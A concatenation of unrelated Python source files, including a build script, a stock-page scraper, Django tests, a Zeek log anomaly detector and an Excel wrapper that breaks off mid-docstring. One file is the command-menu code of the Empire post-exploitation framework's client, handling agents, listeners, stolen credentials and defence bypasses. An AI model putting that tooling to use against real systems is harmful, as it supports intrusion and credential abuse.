build_options.append('-DFEATURE_VALGRIND=%s' % arguments.valgrind)
build_options.append('-DFEATURE_VALGRIND_FREYA=%s' % arguments.valgrind_freya)
build_options.extend(arguments.cmake_param)
return build_options
def configure_output_dir(arguments):
if not os.path.isabs(arguments.builddir):
arguments.builddir = os.path.join(settings.PROJECT_DIR, arguments.builddir)
if arguments.clean and os.path.exists(arguments.builddir):
shutil.rmtree(arguments.builddir)
if not os.path.exists(arguments.builddir):
os.makedirs(arguments.builddir)
def configure_build(arguments):
configure_output_dir(arguments)
build_options = generate_build_options(arguments)
cmake_cmd = ['cmake', '-B' + arguments.builddir, '-H' + settings.PROJECT_DIR]
cmake_cmd.extend(build_options)
return subprocess.call(cmake_cmd)
def build_jerry(arguments):
return subprocess.call(['make', '--no-print-directory', '-j', str(arguments.jobs), '-C', arguments.builddir])
def print_result(ret):
print('=' * 30)
if ret:
print('Build failed with exit code: %s' % (ret))
else:
print('Build succeeded!')
print('=' * 30)
def main():
arguments = get_arguments()
ret = configure_build(arguments)
if not ret:
ret = build_jerry(arguments)
print_result(ret)
sys.exit(ret)
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
import scrapy
import pandas as pd
from basic1.items import Basic1Item
df = pd.read_csv("stock50.csv", encoding="big5", header=None)
class B1Spider(scrapy.Spider):
name = 'b1'
allowed_domains = ['tw.stock.yahoo.com']
start_urls = []
codes = df[0]
for code in codes:
start_urls.append("https://tw.stock.yahoo.com/d/s/company_" + str(code) + ".html")
def parse(self, response):
code = response.url[-9:-5]
item = Basic1Item()
content_list = response.xpath("//table[2]//tr[position()>=2 and position() <=6]/td[2]//text()").extract()
item['code'] = code
item['qgr'] = content_list[0]
item['qopr'] = content_list[1]
item['qnir'] = content_list[2]
item['qroa'] = content_list[3]
item['qroe'] = content_list[4]
yield item
|
class OrderUpdateReasonEnum:
ORDER_UPDATE_REASON_UNSET = 0
OPEN_ORDERS_REQUEST_RESPONSE = 1
NEW_ORDER_ACCEPTED = 2
GENERAL_ORDER_UPDATE = 3
ORDER_FILLED = 4
ORDER_FILLED_PARTIALLY = 5
ORDER_CANCELED = 6
ORDER_CANCEL_REPLACE_COMPLETE = 7
NEW_ORDER_REJECTED = 8
ORDER_CANCEL_REJECTED = 9
ORDER_CANCEL_REPLACE_REJECTED = 10
|
"""FileTailer Python Class"""
from __future__ import print_function
import os
import sys
import argparse
import time
import math
from collections import Counter
# Third Party Imports
import pandas as pd
from sklearn.ensemble import IsolationForest
from sklearn.cluster import KMeans
# Local imports
from bat import bro_log_reader, live_simulator
from bat import dataframe_to_matrix, dataframe_cache
if __name__ == '__main__':
# Example to show the dataframe cache functionality on streaming data
pd.set_option('display.width', 200)
# Collect args from the command line
parser = argparse.ArgumentParser()
parser.add_argument('bro_log', type=str, help='Specify a bro log to run BroLogReader test on')
args, commands = parser.parse_known_args()
# Check for unknown args
if commands:
print('Unrecognized args: %s' % commands)
sys.exit(1)
# File may have a tilde in it
if args.bro_log:
args.bro_log = os.path.expanduser(args.bro_log)
# Sanity check for either http or dns log
if 'http' in args.bro_log:
log_type = 'http'
features = ['id.resp_p', 'method', 'resp_mime_types', 'request_body_len']
elif 'dns' in args.bro_log:
log_type = 'dns'
features = ['Z', 'rejected', 'proto', 'query', 'qclass_name', 'qtype_name', 'rcode_name', 'query_length']
else:
print('This example only works with Bro with http.log or dns.log files..')
sys.exit(1)
# Create a Bro log reader
print('Opening Data File: {:s}'.format(args.bro_log))
reader = bro_log_reader.BroLogReader(args.bro_log, tail=True)
# OR you could create a live simulator to test it out on a static log file
# reader = live_simulator.LiveSimulator(args.bro_log)
# Create a Dataframe Cache
df_cache = dataframe_cache.DataFrameCache(max_cache_time=600) # 10 minute cache
# Add each new row into the cache
time_delta = 30
timer = time.time() + time_delta
for row in reader.readrows():
df_cache.add_row(row)
# Every 30 seconds grab the dataframe from the cache
if time.time() > timer:
timer = time.time() + time_delta
# Get the windowed dataframe (10 minute window)
bro_df = df_cache.dataframe()
# Add query length
bro_df['query_length'] = bro_df['query'].str.len()
# Use the bat DataframeToMatrix class
features = ['Z', 'rejected', 'proto', 'query', 'qclass_name', 'qtype_name', 'rcode_name', 'query_length', 'id.resp_p']
to_matrix = dataframe_to_matrix.DataFrameToMatrix()
bro_matrix = to_matrix.fit_transform(bro_df[features])
print(bro_matrix.shape)
# Print out the range of the daterange and some stats
print('DataFrame TimeRange: {:s} --> {:s}'.format(str(bro_df['ts'].min()), str(bro_df['ts'].max())))
# Train/fit and Predict anomalous instances using the Isolation Forest model
odd_clf = IsolationForest(contamination=0.01) # Marking 1% as odd
odd_clf.fit(bro_matrix)
# Now we create a new dataframe using the prediction from our classifier
odd_df = bro_df[odd_clf.predict(bro_matrix) == -1]
# Now we're going to explore our odd observations with help from KMeans
num_clusters = min(len(odd_df), 10) # 10 clusters unless we have less than 10 observations
odd_matrix = to_matrix.fit_transform(odd_df[features])
odd_df['cluster'] = KMeans(n_clusters=num_clusters).fit_predict(odd_matrix)
print(odd_matrix.shape)
# Now group the dataframe by cluster
cluster_groups = odd_df.groupby('cluster')
# Now print out the details for each cluster
show_fields = ['id.orig_h', 'id.resp_h'] + features
print('<<< Outliers Detected! >>>')
for key, group in cluster_groups:
print('\nCluster {:d}: {:d} observations'.format(key, len(group)))
print(group[show_fields].head())
|
import datetime
from django.utils import timezone
from django.test import TestCase
from django.urls import reverse
from .models import Account
# Create your tests here.
class AccountMethodTests(TestCase):
def test_was_added_recently_with_future_account(self):
"""
was_added_recently() should return False for accounts whose date_added
is in the future.
"""
time = timezone.now() + datetime.timedelta(days=30)
future_account = Account(date_added=time)
self.assertIs(future_account.was_added_recently(), False)
def test_was_added_recently_with_old_account(self):
"""
was_added_recently() should return False for accounts whose
added_date is older than a day.
"""
time = timezone.now() - datetime.timedelta(days=30)
old_account = Account(date_added=time)
self.assertIs(old_account.was_added_recently(), False)
def test_was_added_recently_with_recent_account(self):
"""
was_added_recently() should run True for accounts whose added_date is
within the last day.
"""
time = timezone.now() - datetime.timedelta(hours=1)
recent_account = Account(date_added=time)
self.assertIs(recent_account.was_added_recently(), True)
def create_account(account_name, days):
"""
Creates an account with the given `account_name` and published the given
number of `days` offset to now (negative for accounts published in the
past, positive for accounts that have yet to be published).
"""
time = timezone.now() + datetime.timedelta(days=days)
return Account.objects.create(account_name=account_name, date_added=time)
class AccountViewTests(TestCase):
def test_index_view_with_no_accounts(self):
"""
If no accounts exist, an appropriate message should be displayed.
"""
response = self.client.get(reverse('prospecting:index'))
self.assertEqual(response.status_code, 200)
self.assertContains(response, "No accounts have been added.")
self.assertQuerysetEqual(response.context['latest_account_list'], [])
def test_index_view_with_a_past_account(self):
"""
Accounts with a date_added in the past should be displayed on the index
page.
"""
create_account(account_name="Past account.", days=-30)
response = self.client.get(reverse('prospecting:index'))
self.assertQuerysetEqual(
response.context['latest_account_list'], ['<Account: Past account.>']
)
def test_index_view_with_a_future_account(self):
"""
Accounts with a date_added in the future should not be displayed on the
index page.
"""
create_account(account_name="Future account.", days=30)
response = self.client.get(reverse('prospecting:index'))
self.assertContains(response, "No accounts have been added.")
self.assertQuerysetEqual(response.context['latest_account_list'], [])
def test_index_view_with_future_account_and_past_account(self):
"""Even if both past and future accounts exist, only past accounts
should be displayed.
"""
create_account(account_name="Past account.", days=-30)
create_account(account_name="Future account.", days=30)
response = self.client.get(reverse('polling:index'))
self.assertQuerysetEqual(
response.context['latest_account_list'], ['<Account: Past account.>']
)
def test_index_view_with_two_past_accounts(self):
"""
The accounts index page may display multiple accounts.
"""
create_account(account_name="Past account 1.", days=-30)
create_account(account_name="Past account 2.", days=-5)
response = self.client.get(reverse('prospecting:index'))
self.assertQuerysetEqual(
response.context['latest_account_list'], ['<Account: Past account 2.>', '<Account: Past account 1.>']
)
class AccountIndexDetailTest(TestCase):
def test_detail_view_with_a_future_account(self):
"""
The detail view of an account with a date_added in the future should return
a 404 not found.
"""
future_account = create_account(account_name='Future account.', days=5)
url = reverse('prospecting:detail', args=(future_account.id,))
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_detail_view_with_a_past_account(self):
"""
The detail view of an account with a date_added in the past should
display the account's text.
"""
past_account = create_account(account_name='Past Account.', days=-5)
url = reverse('prospecting:detail', args=(past_account.id,))
response = self.client.get(url)
self.assertContains(response, past_account.account_name)
|
from typing import List
from prompt_toolkit import HTML
from prompt_toolkit.completion import Completion
from empire.client.src.EmpireCliState import state
from empire.client.src.menus.Menu import Menu
from empire.client.src.utils import print_util, table_util
from empire.client.src.utils.autocomplete_util import (
current_files,
filtered_search_list,
position_util,
where_am_i,
)
from empire.client.src.utils.cli_util import command
class UseMenu(Menu):
"""
A base menu object that can be used when needing the typical "use" behavior.
Such as set, unset, info
"""
def __init__(self, display_name="", selected="", record=None, record_options=None):
"""
:param display_name: See Menu
:param selected: See Menu
:param record: The record object
:param record_options: The options to configure for the current record
"""
super().__init__(display_name=display_name, selected=selected)
self.record = record
self.record_options = record_options
def get_completions(self, document, complete_event, cmd_line, word_before_cursor):
"""
Adds autocomplete for the set and unset methods and defers to the base Menu when trying to invoke
global commands (position 1 commands).
"""
if cmd_line[0] in ["set", "unset"] and position_util(
cmd_line, 2, word_before_cursor
):
for option in filtered_search_list(word_before_cursor, self.record_options):
yield Completion(option, start_position=-len(word_before_cursor))
elif (
cmd_line[0] == "set"
and len(cmd_line) > 1
and cmd_line[1] == "bypasses"
and "bypasses" in map(lambda x: x.lower(), self.record_options.keys())
and position_util(
cmd_line, where_am_i(cmd_line, word_before_cursor), word_before_cursor
)
):
for suggested_value in filtered_search_list(
word_before_cursor, state.bypasses
):
if suggested_value not in cmd_line:
yield Completion(
suggested_value, start_position=-len(word_before_cursor)
)
elif cmd_line[0] == "set" and position_util(cmd_line, 3, word_before_cursor):
if len(cmd_line) > 1 and cmd_line[1] == "listener":
for listener in filtered_search_list(
word_before_cursor, state.listeners.keys()
):
yield Completion(listener, start_position=-len(word_before_cursor))
if len(cmd_line) > 1 and cmd_line[1] == "profile":
for profile in filtered_search_list(
word_before_cursor, state.profiles.keys()
):
yield Completion(profile, start_position=-len(word_before_cursor))
if len(cmd_line) > 1 and cmd_line[1] == "agent":
for agent in filtered_search_list(
word_before_cursor, state.agents.keys()
):
yield Completion(agent, start_position=-len(word_before_cursor))
if len(cmd_line) > 1 and cmd_line[1] == "file":
if len(cmd_line) > 2 and cmd_line[2] == "-p":
yield Completion(
state.search_files(), start_position=-len(word_before_cursor)
)
else:
for files in filtered_search_list(
word_before_cursor, current_files(state.directory["downloads"])
):
yield Completion(
files,
display=files.split("/")[-1],
start_position=-len(word_before_cursor),
)
if len(cmd_line) > 1 and cmd_line[1] == "credid":
for cred in filtered_search_list(
word_before_cursor, state.credentials.keys()
):
full = state.credentials[cred]
help_text = print_util.truncate(
f"{full.get('username', '')}, {full.get('domain', '')}, {full.get('password', '')}",
width=75,
)
yield Completion(
cred,
display=HTML(f"{full['ID']} <purple>({help_text})</purple>"),
start_position=-len(word_before_cursor),
)
if (
len(cmd_line) > 1
and len(self.suggested_values_for_option(cmd_line[1])) > 0
):
for suggested_value in filtered_search_list(
word_before_cursor, self.suggested_values_for_option(cmd_line[1])
):
yield Completion(
suggested_value, start_position=-len(word_before_cursor)
)
elif position_util(cmd_line, 1, word_before_cursor):
yield from super().get_completions(
document, complete_event, cmd_line, word_before_cursor
)
@command
def set(self, key: str, value: str):
"""
Set a field for the current record. If setting a File, provide -p for a file selection dialog.
Usage: set <key> <value>
"""
# The value is always sent with additional wrapping quotes due to parsing crap,
# So we strip the first set of quotes (because there may be another set of quotes that are
# meant to be sent to the api).
if value.startswith('"') and value.endswith('"'):
value = value[1:-1]
if key in self.record_options:
self.record_options[key]["Value"] = value
print(print_util.color("[*] Set %s to %s" % (key, value)))
else:
print(print_util.color(f"Could not find field: {key}"))
@command
def unset(self, key: str):
"""
Unset a record option
Usage: unset <key>
"""
if key in self.record_options:
self.record_options[key]["Value"] = ""
print(print_util.color("[*] Unset %s" % key))
else:
print(print_util.color(f"Could not find field: {key}"))
@command
def options(self):
"""
Print the current record options
Usage: options
"""
record_list = []
for key, value in self.record_options.items():
name = key
record_value = print_util.text_wrap(value.get("Value", ""))
required = print_util.text_wrap(value.get("Required", ""))
description = print_util.text_wrap(value.get("Description", ""))
record_list.append([name, record_value, required, description])
record_list.insert(0, ["Name", "Value", "Required", "Description"])
table_util.print_table(record_list, "Record Options")
@command
def info(self):
""" "
Print default info on the current record.
Usage: info
"""
record_list = []
for key, values in self.record.items():
if key in [
"Name",
"Author",
"Comments",
"Description",
"Language",
"Background",
"NeedsAdmin",
"OpsecSafe",
"Techniques",
"Software",
]:
if isinstance(values, list):
if len(values) > 0 and values[0] != "":
for i, value in enumerate(values):
if key == "Techniques":
value = "http://attack.mitre.org/techniques/" + value
if i == 0:
record_list.append(
[
print_util.color(key, "blue"),
print_util.text_wrap(value, width=70),
]
)
else:
record_list.append(
["", print_util.text_wrap(value, width=70)]
)
elif values != "":
if key == "Software":
values = "http://attack.mitre.org/software/" + values
record_list.append(
[
print_util.color(key, "blue"),
print_util.text_wrap(values, width=70),
]
)
table_util.print_table(
record_list, "Record Info", colored_header=False, no_borders=True
)
def suggested_values_for_option(self, option: str) -> List[str]:
try:
lower = {k.lower(): v for k, v in self.record_options.items()}
return lower.get(option, {}).get("SuggestedValues", [])
except AttributeError:
return []
|
from django.test import TestCase
from core.tests.utils import sample_user
from ..models import Tag
class TagModelTest(TestCase):
def test_tag_str(self):
"""Test the tag string representation"""
tag = Tag.objects.create(
user=sample_user(),
name='Meat Lover'
)
self.assertEqual(str(tag), tag.name)
|
from selenium.webdriver.common.by import By
class LoginLocators(object):
INPUT_USERNAME = (By.ID, 'user-name')
INPUT_PASSWORD = (By.ID, 'password')
BUTTON_LOGIN = (By.ID, 'login-button')
LABEL_MESSAGE = (By.XPATH, '//*[@id="login_button_container"]/div/form/h3')
|
import os, torch, numpy as np
from torch_geometric.data import InMemoryDataset, Data, download_url, extract_zip
import shutil
import networkx as nx
import pickle
class CyclesDataset(InMemoryDataset):
url = 'https://drive.switch.ch/index.php/s/hv65hmY48GrRAoN/download'
def __init__(self, root, train, k=8, n=50, proportion=1.0, n_samples=10000, transform=None, pre_transform=None, pre_filter=None):
self.train = train
self.k, self.n, self.n_samples = k, n, n_samples
self.s = 'train' if train else 'test'
self.proportion = proportion
super().__init__(root, transform, pre_transform, pre_filter)
self.data, self.slices = torch.load(self.processed_paths[0])
@property
def raw_file_names(self):
return ['{}cycles_n{}_{}samples_{}.pt'.format(self.k, self.n, self.n_samples, self.s)]
@property
def processed_file_names(self):
return [f'processed_{self.k}cycles_n{self.n}_{self.n_samples}samples_{self.s}_{self.proportion}.pt']
def download(self):
shutil.rmtree(self.raw_dir)
path = download_url(self.url, self.raw_dir)
extract_zip(path, self.raw_dir)
self.build_dataset()
def build_dataset(self):
""" Given pickle files, split the dataset into one per value of n
Run once before running the experiments. """
n_samples = 10000
for k in [4, 6, 8]:
with open(os.path.join(self.raw_dir, f'datasets_kcycle_k={k}_nsamples={n_samples}.pickle'), 'rb') as f:
datasets_params, datasets = pickle.load(f)
# Split by graph size
for params, dataset in zip(datasets_params, datasets):
n = params['n']
train, test = dataset[:n_samples], dataset[n_samples:]
torch.save(train, os.path.join(self.raw_dir, f'{k}cycles_n{n}_{n_samples}samples_train.pt'))
torch.save(test, os.path.join(self.raw_dir, f'{k}cycles_n{n}_{n_samples}samples_test.pt'))
def process(self):
# Read data into huge `Data` list.
dataset = torch.load(os.path.join(self.raw_dir, f'{self.k}cycles_n{self.n}_{self.n_samples}samples_{self.s}.pt'))
data_list = []
for sample in dataset:
graph, y, label = sample
edge_list = nx.to_edgelist(graph)
edges = [np.array([edge[0], edge[1]]) for edge in edge_list]
edges2 = [np.array([edge[1], edge[0]]) for edge in edge_list]
edge_index = torch.tensor(np.array(edges + edges2).T, dtype=torch.long)
x = torch.ones(graph.number_of_nodes(), 1, dtype=torch.float)
y = torch.tensor([1], dtype=torch.long) if label == 'has-kcycle' else torch.tensor([0], dtype=torch.long)
data_list.append(Data(x=x, edge_index=edge_index, edge_attr=None, y=y))
# Subsample the data
if self.train:
all_data = len(data_list)
to_select = int(all_data * self.proportion)
print(to_select, "samples were selected")
data_list = data_list[:to_select]
if self.pre_filter is not None:
data_list = [data for data in data_list if self.pre_filter(data)]
if self.pre_transform is not None:
data_list = [self.pre_transform(data) for data in data_list]
data, slices = self.collate(data_list)
torch.save((data, slices), self.processed_paths[0])
if __name__ == '__main__':
print(CyclesDataset('data/CYCLE', False)) |
from pathlib import Path
from typing import Dict, Optional, Sequence, Tuple
import numpy as np
import pandas as pd
from etl import *
from epimargin.utils import cwd, days
if __name__ == '__main__':
root = cwd()
data = root/'data'
figs = root/'figs'
# load meta data for metro-state aggregations & filter to top 100 metro areas
county_populations = load_us_county_data('covid_county_population_usafacts.csv')
county_populations = county_populations[county_populations['county_name'] != 'Statewide Unallocated']
metro_areas = load_metro_areas(data/'county_metro_state_walk.csv').rename(columns={'state_codes': 'state', 'county_fips': 'countyfips'})
top_metros = get_top_metros(county_populations, metro_areas)
top_metros = county_populations.merge(top_metros[['countyfips','cbsa_fips']], on='countyfips')
top_metros = top_metros.groupby(['cbsa_fips', 'state']).apply(pop_prop_col)
top_metros['metro-state'] = top_metros['cbsa_fips'].astype(int).astype(str) + '_' + top_metros['state']
# load county level daily case data
case_df = load_us_county_data('covid_confirmed_usafacts.csv')
county_case_ts = get_case_timeseries(case_df).merge(top_metros, on='countyfips', how='inner')
# load county level google mobility data, and impute/drop missing data
## N.B parks_percent_change_from_baseline and transit_stations_percent_change_from_baseline still have a lot of missing --> drop these columns from analysis
us_mobility = load_country_google_mobility('US').rename(columns={'sub_region_1': 'state_name', 'census_fips_code': 'countyfips'})
county_mobility_ts = us_mobility[~(us_mobility['countyfips'].isna())].set_index(['countyfips', 'date'])
county_mobility_ts = impute_missing_mobility(county_mobility_ts)
county_mobility_imputed, lst_cnt = remain_county(county_mobility_ts.merge(county_populations[['countyfips','population']], on='countyfips'))
# metro-state level aggregation
metro_state_cases = pd.DataFrame(county_case_ts.groupby(['metro-state', 'date'])['daily_confirmed_cases'].sum())
metro_state_mobility = metro_state_mobility_agg(county_mobility_imputed.merge(top_metros, on='countyfips', how='inner'))
# load rt daily data
rt_drop_cols = ['RR_pred_rtliveold', 'RR_CI_lower_rtliveold', 'RR_CI_upper_rtliveold']
metro_state_rt = pd.read_csv(data/'+rt_estimates_comparison.csv', parse_dates=['date']).iloc[:,1:].rename(columns={'cbsa_fips_state':'metro-state'}).set_index(['metro-state','date'])
metro_state_rt.drop(columns=rt_drop_cols, inplace=True)
# create metro-state aggregated df
metro_state_df = metro_state_mobility.join(metro_state_cases.join(metro_state_rt)).join(top_metros[['metro-state','state', 'cbsa_fips']].drop_duplicates().set_index('metro-state'))
# add state level intervention dummies
state_interventions = state_level_intervention_data(data/'COVID-19 US state policy database_08_03_2020.xlsx').reset_index().rename(columns={'STATE':'state_name'})
metro_state_df = metro_state_df.reset_index().merge(state_interventions, on='state').set_index(['metro-state', 'date'])
metro_state_df = metro_state_df.groupby(['metro-state']).apply(fill_dummies, 'stay_at_home', 'start_stay_at_home', 'end_stay_at_home')
metro_state_df = metro_state_df.groupby(['metro-state']).apply(fill_dummies, 'mask_mandate', 'mask_mandate_all')
# add dummy to only include places once their outbreak has started - seems that 10 cases is the threshold used
metro_state_df = start_outbreak_dummy(metro_state_df)
# add dummies for metro areas
metro_state_df = get_metro_dummies(metro_state_df)
metro_state_df.to_csv(data/'metro_state_policy_evaluation.csv')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
import win32com.client as _win
import pywintypes as _pywintypes
except:
raise Exception()
import pandas as _pd
import os as _os
import datetime as _datetime
import pytz as _pytz
import numpy as _np
from copy import copy as _copy
from pyXL.excel_utils import _cr2a, _a2cr, _n2x, _x2n, _splitaddr, _df2outline, _isnumeric,_df_to_ll
class Rng:
"""
class which allows to manipulate excel ranges encapsulating applescript instructions
example:
x=XL.Excel() # this is just a reference to excel and allows to set a few settings, such as calculation etc.
wb=x.create_wb() # create a new workbook, returns instance of Workbook object
sh=wb.create_sheet('pippo') # create a new sheet named "pippo", returns instance of Sheet object
wb.sheets # return a list of sheets
sh2=wb.sheets[1] # get reference of sheet 1
r=sh.arng('B2') # access a range on the sheet
r #prints current "coordinates"
temp=TS.DataFrame(np.random.randn(30,4),columns=list('abcd'))
r.from_pandas(temp) #write data to current sheet
r #coordinates have changed!!
r.format_range({'b':'@','d':'0.0000'},{'c':40}) #do some formatting
r.sort('b') # do some sorting
r.to_pandas() #read data from current sheet
"""
def __repr__(self):
"""
print out coordinates of the range object
:return:
"""
return "Workbook: %s\tSheet: %s\tRange: %s" % (self.sheet.workbook.name, self.sheet.name, self.address)
def __init__(self, address=None, sheet=None, col=None, row=None):
"""
Initialize a range object from a given set of address, sheet name and workbook name
if any of these is not given, then they are fetched using "active" logic
:param address: range address, using A1 style (RC is not yet supported)
:param sheet: name of the sheet
:param workbook: name of the workbook
"""
self.range=None
self.sheet = None
self.address = None
if address is not None or col is not None or row is not None:
if address is not None:
self.address = address.replace('$', '').replace('"', '')
elif row is None and col is not None:
c = _n2x(col)
self.address = '%s:%s' % (c, c)
elif row is not None and col is None:
self.address = '%i:%i' % (row, row)
else:
self.address = '%s%i' % (_n2x(col), row)
if sheet is not None:
self.sheet = sheet
self._set_address()
def _set_address(self):
if self.sheet is None:
self.sheet = Sheet()
if self.address is None:
addr=self.sheet.ws.Selection.GetAddress(0, 0)
if self.address is None:
self.address = addr
if self.sheet is None:
self.sheet = Sheet(existing=self.sheet.ws)
self.range=self.sheet.ws.Range(self.address)
def arng(self, address=None, row=None, col=None):
"""
method for quick access to different range on same sheet
:param address:
:param row: 1-based
:param col: 1-based
:return:
"""
return Rng(address=address, sheet=self.sheet, row=row, col=col)
def offset(self, r=0, c=0):
"""
return new range object offset from the original by r rows and c columns
:param r: number of rows to offset by
:param c: number of columns to offset by
:return: new range object
"""
coords = _a2cr(self.address)
if len(coords) == 2:
newaddr = _cr2a(coords[0] + c, coords[1] + r)
else:
newaddr = _cr2a(coords[0] + c, coords[1] + r, coords[2] + c, coords[3] + r)
return Rng(address=newaddr, sheet=self.sheet)
def iloc(self, r=0, c=0):
"""
return a cell in the range based on coordinates starting from left top cell
:param r: row index
:param c: columns index
:return:
"""
coords = _a2cr(self.address)
newaddr = _cr2a(coords[0] + c, coords[1] + r)
return Rng(address=newaddr, sheet=self.sheet)
def resize(self, r=0, c=0, abs=True):
"""
new range object with address with same top left coordinate but different size (see abs param)
:param r:
:param c:
:param abs: if true, then r and c determine the new size, otherwise they are added to current size
:return: new range object
"""
coords = _a2cr(self.address)
if len(coords) == 2: coords = coords + coords
if abs:
newaddr = _cr2a(coords[0], coords[1], coords[0] + max(0, c - 1), coords[1] + max(0, r - 1))
else:
newaddr = _cr2a(coords[0], coords[1], max(coords[0], coords[2] + c), max(coords[1], coords[3] + r))
return Rng(address=newaddr, sheet=self.sheet)
def row(self, idx):
"""
range with given row of current range
:param idx: indexing is 1-based, negative indices start from last row
:return: new range object
"""
coords = _a2cr(self.address)
if len(coords) == 2:
return _copy(self)
else:
newcoords = _copy(coords)
if idx < 0:
newcoords[1] = newcoords[3] + idx + 1
else:
newcoords[1] += idx - 1
newcoords[3] = newcoords[1]
newaddr = _cr2a(*newcoords)
return Rng(address=newaddr, sheet=self.sheet)
def column(self, idx):
"""
range with given col of current range
:param idx: indexing is 1-based, negative indices start from last col
:return: new range object
"""
coords = _a2cr(self.address)
if len(coords) == 2:
return _copy(self)
else:
newcoords = _copy(coords)
if idx < 0:
newcoords[0] = newcoords[2] + idx + 1
else:
newcoords[0] += idx - 1
newcoords[2] = newcoords[0]
newaddr = _cr2a(*newcoords)
return Rng(address=newaddr, sheet=self.sheet)
def format(self, fmt=None, halignment=None, valignment=None, wrap_text=False):
"""
formats a range
if fmt is None, return current format
otherwise, you can also set alignment and wrap text
:param fmt: excel format string, look at U.FX for examples
:param halignment: right, left, center
:param valignment: top, middle, bottom
:param wrap_text: true or false
:return:
"""
if fmt is not None:
self.range.NumberFormat=fmt
elif halignment is not None:
pass
elif valignment is not None:
pass
elif wrap_text:
pass
else:
return self.range.NumberFormat
def filldown(self):
"""
fill down content of first row to rest of selection
:return:
"""
self.range.FillDown()
def color(self, col=None):
"""
colors a range interior
:param col: RGB triplet, or None to remove coloring
:return:
"""
self.range.Interior.Color = _rgb2xlcol(col)
def value(self, v=None):
"""
get or set the value of a range
:param v: value to be set, if None current value is returned
:return:
"""
if v is None:
out = self.range.Value
out=_parse_windates(out)
return out
else:
if _isnumeric(v):
self.range.Value = v
elif isinstance(v, str):
self.range.Value = v
elif isinstance(v, (_datetime.date, _datetime.datetime)):
self.range.Value = _dt2pywintime(v)
elif isinstance(v, (_pd.DataFrame, _pd.Series)):
return self.from_pandas(v)
elif isinstance(v, (list, tuple, _np.ndarray)):
temp = _pd.DataFrame(v)
return self.from_pandas(temp, header=False, index=False)
else:
raise Exception('Unhandled datatype')
def get_array(self, string_value=False):
"""
get an excel range as a list of lists
:return: list
"""
val=self.value()
val=_parse_windates(val)
return val
def to_pandas(self, index=1, header=1):
"""
return a range as dataframe
:param index: None for no index, otherwise an integer specifying first n columns to use as index
:param header: None to avoid using columns, any other value to use first n rows as column header
:return:
"""
temp=self.get_array()
if header is None:
temp = _pd.DataFrame(_pd.np.array(temp))
elif header==1:
hdr = temp[0]
temp = _pd.DataFrame(_pd.np.array(temp[header:]), columns=hdr)
elif header>1:
hdr=_pd.MultiIndex.from_tuples(temp[:header])
temp = _pd.DataFrame(_pd.np.array(temp[header:]), columns=hdr)
else: raise Exception()
if index is not None:
temp = temp.set_index(temp.columns.tolist()[:index])
return temp
# def cell(self, value=None, formula=None, format=None, asarray=False):
# """
# get or set value, formula and format of a cell
#
# :param value:
# :param formula:
# :param format:
# :param asarray: specify if formula should be of array type
# :return:
# """
# if value is not None:
# self.value(value)
# if formula is not None:
# self.formula(formula,asarray=asarray)
# if format is not None:
# self.format(format)
#
# if value is None and formula is None and format is None:
# return self.value(), self.range.StringValue, self.formula(), self.format()
def formula(self, f=None, asarray=False):
"""
get or set the value of a range
:param f: formula to be set, if None current formula is returned
:param asarray: set array formula
:return:
"""
if f is not None:
if asarray:
self.range.FormulaArray=f
else:
self.range.Formula=f
else:
return self.range.Formula
def get_selection(self):
"""
refresh range coordinates based on current selection
this modifies the current instance of the object!
:return:
"""
self.address = self.sheet.workbook.parent.app.Selection.GetAddress(0,0)
self._set_address()
def get_cells(self):
"""
TODO
return a list of all addresses of cells in range
:return:
"""
temp = self.range.Cells()
return [x.GetAddress(0,0) for x in temp]
def from_pandas(self, pdobj, header=True, index=True, index_label=None, outline_string=None):
"""
write a pandas object to excel
:param pdobj: any DataFrame or Series object
:param header: if False, strip header
:param index: if False, strip index
:param index_label: index header
:param outline_string: a string used to identify outline main levels (eg " All")
:return:
"""
temp = _df_to_ll(pdobj,header=header, index=index)
temp = _fix_4_win(temp)
trange = self.resize(len(temp), len(temp[0]))
trange.range.Value=temp
self.address = trange.address
self.range = self.sheet.ws.Range(self.address)
if outline_string is not None:
boundaries = _df2outline(pdobj, outline_string)
self.outline(boundaries)
return temp
def clear_formats(self):
"""
clear all formatting from range
:return:
"""
self.range.ClearFormats()
def delete(self, r=None, c=None):
"""
delete entire rows or columns
:param r: a (list of) row(s)
:param c: a (list of) column(s)
:return:
"""
assert (r is None) ^ (c is None), "Either r or c must be specified, not both!"
if r is not None:
if not isinstance(r, (tuple, list)): r = [r]
for rr in r:
self.iloc(r=rr).EntireRow.Delete(Shift=_pywintypes.xlUp)
if c is not None:
if not isinstance(c, (tuple, list)): c = [c]
for rr in c:
self.iloc(c=rr).EntireCol.Delete(Shift=_pywintypes.xlLeft)
def insert(self, r=None, c=None):
"""
insert rows or columns
:param r: a (list of) row(s)
:param c: a (list of) column(s)
:return:
"""
return
assert (r is None) ^ (c is None), "Either r or c must be specified, not both!"
if r is not None:
if not isinstance(r, (tuple, list)): r = [r]
for rr in r:
self.iloc(r=rr).EntireRow.Insert(Shift=_pywintypes.xlDown)
if c is not None:
if not isinstance(c, (tuple, list)): c = [c]
for rr in c:
self.iloc(c=rr).EntireCol.Insert(Shift=_pywintypes.xlRight)
def clear_values(self):
"""
clear all values from range
:return:
"""
self.range.ClearContents()
def column_width(self, w):
"""
change width of the column(s) of range
:param w: width
:return:
"""
self.range.EntireColumn.ColumnWidth=w
def row_height(self, h):
"""
change height of the row(s) of range
:param h: height
:return:
"""
self.range.EntireRow.RowHeight=h
def curr_region(self):
"""
get range of the current region
:return: new range object
"""
temp=self.range.CurrentRegion.GetAddress(0,0)
return Rng(address=temp, sheet=self.sheet)
def replace(self, val, repl_with, whole=False):
"""
within the range, replace val with repl_with
:param val: value to be looked for
:param repl_with: value to replace with
:return:
"""
self.range.Replace(What=val,Replacemente=repl_with,LookAt=(_pywintypes.xlWhole if whole else _pywintypes.xlPart))
pass
def sort(self, key1, order1=None, key2=None, order2=None, key3=None, order3=None, header=True):
"""
TODO
sort data in a range, for now works only if header==True
keys must be column header labels
:param key1: header string
:param order1: d/a
:param key2:
:param order2:
:param key3:
:param order3:
:param header:
:return:
"""
pass
def format_range(self, fmt_dict={}, cw_dict={}, columns=True):
"""
formats multiple columns (or rows) at once
:param fmt_dict: dictionary where keys are column headers of the range (i.e. strings in the first row) while
values are excel formatting codes
fmt_dict keys may also be regular expressions which are then matched against column names
(eg .* may be used as wildcard key, i.e. any columns are matched against this)
:param cw_dict: same fmt_dict but instead of format strings must contain column widths (row heights)
:param columns: if True iterate over columns, else over rows
:return:
